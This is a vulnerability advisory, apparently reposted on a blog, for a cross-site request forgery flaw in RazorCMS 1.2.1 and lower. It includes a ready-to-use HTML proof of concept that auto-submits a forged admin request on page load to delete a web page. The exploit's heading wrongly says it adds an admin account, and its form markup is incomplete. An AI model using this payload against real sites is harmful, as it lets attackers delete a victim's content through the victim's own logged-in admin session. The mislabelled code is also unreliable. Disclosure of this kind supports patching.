RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)

+————————————————————————————————————————————+

# Software link : http://www.razorcms.co.uk/archive/core/razorCMS_core_v1_2_1_STABLE.zip
# Vendor site   : http://www.razorcms.co.uk/
# Version       : 1.2.1 STABLE and lower
# Tested on     : Debian Squeeze (6.0)
+————————————————————————————————————————————+
Summary
1)Introduction
2)Vulnerabilities Description
3)Exploit (Delete Web Page)
+————————————————————————————————————————————+
1)Introduction
“razorCMS is ideally suited to small to medium website projects, it can be run without need for a database, due to it’s flat file
structure it has no need for a database meaning it can also be a cost effected method in content management, allowing it to be
used on the cheapest of web hosts, or even free hosting”.
2)Vulnerabilities Description
RazorCMS 1.2.1 STABLE (and lower)  is affected by CSRF Vulnerability which allows an attacker to delete web pages, both published
and unpublished.
3)Exploit (Delete Web Page)
<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2>CSRF Exploit to add ADMIN account</H2>
<form method=”POST” name=”form0″ action=”http://<razorcms_ip&gt;:80/razorcms/admin/?action=showcats&unpub=true&slabID=2&catname=sidebar”>
</body>
</html>
In this POC I’ve deleted web page with ID=2
+————————————————————————————————————————————+

Thank’s to Ivano

Iklan

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s